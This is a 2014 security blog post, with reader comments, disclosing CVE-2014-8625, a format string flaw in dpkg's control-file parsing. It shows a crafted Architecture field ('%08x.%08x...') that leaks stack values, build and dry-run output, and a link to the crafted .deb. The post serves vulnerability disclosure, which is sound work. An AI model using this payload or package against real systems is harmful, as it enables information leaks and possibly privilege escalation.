Just Another Security/Programming Blog: `dpkg' format string vulnerability. CVE-2014-8625

Monday, 10 November 2014

`dpkg' format string vulnerability. CVE-2014-8625

A few days ago, I found a strange/stupid vulnerability in dpkg.

Dpkg is the package manager for Debian-based operation systems, such as Ubuntu.
It handles .deb files.

When creating a dpkg package / .deb a file, a 'control file' must be made. This includes information about the package, such as the package name, description of package, maintainer(s), and version of the package.

That control file is used to display the information before the package is installed.

I found that in the "Architecture" part of the control file, you could put formatting strings, such as %s, %d, etc., and it would output the stack pointer.

For my control file, I have this:

Package: backup
Architecture: %08x.%08x.%08x.%08x.%08x\n
Description: Stuff
maintainer: Joshua Rogers
Version: 1


When building the package, I receive this warning:

dpkg-deb: warning: parsing file 'folder//DEBIAN/control' near line 2 package 'backup:01485120.00415cf8.00000001.00000001.0000001c\n':
 '%08x.%08x.%08x.%08x.%08x\n
Description: Stuff

[....]
01485120.00415cf8 is the stack pointers




The thing about this is, is that it actually builds the package.
So, we have a working deb file with this bug in it.(found here: https://internot.info/docs/folder.deb)

Now that we've got a working .deb file, processing of it will cause the vulnerability to trigger.

Using the '--dry-run' flag in dpkg, which isn't supposed to do anything:

       --no-act, --dry-run, --simulate
              Do everything which is supposed to be done, but don't write any changes. This is used to see what would happen with the specified action, without actually modifying anything.


, the vulnerability will still execute.

Since "dpkg --dry-run -i" requires to be run by root, you could probably root a system using this.

# dpkg --dry-run -i folder.deb
dpkg: warning: parsing file '/tmp/dpkg.XuLMM7/control' near line 2 package 'backup:01e143c0.00431828.00000001.00000001.0000001c\n':
 '%08x.%08x.%08x.%08x.%08x\n
Description: Stuff
maintainer: Joshua Rogers
[.....]



The attack vector is low, because normally people download .deb files to install them. If they install the .deb file, it may just contain a trojan or something along the lines of that. (tl;dr: don't install random .deb files you find).
But, if you're looking to analyze .deb files you find, this may be harmful.

The vulnerable function, "parse_error_msg([...])" is called in many more places than just -i.



The bug was assigned the CVE-ID: CVE-2014-8625.
Original bug report: https://bugs.launchpad.net/ubuntu/+source/dpkg/+bug/1389135
Debian bug report: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=768485

8 comments:

  1. What did you mean by "stack info"?
    What is that?

    ReplyDelete
    Replies
    1. Sorry, I meant the stack pointer.
      I'll fix that up.

      Delete
  2. dude please vulnerable being source code share

    ReplyDelete
    Replies
    1. show code existing on vulnerability

      Delete
    2. Patch is here: https://internot.info/docs/0001-libdpkg-Escape-package-and-architecture-on-control-f.patch
      source(unpatched as I write this) here: http://anonscm.debian.org/cgit/dpkg/dpkg.git/tree/lib/dpkg/parsehelp.c#n40

      Delete

Note: only a member of this blog may post a comment.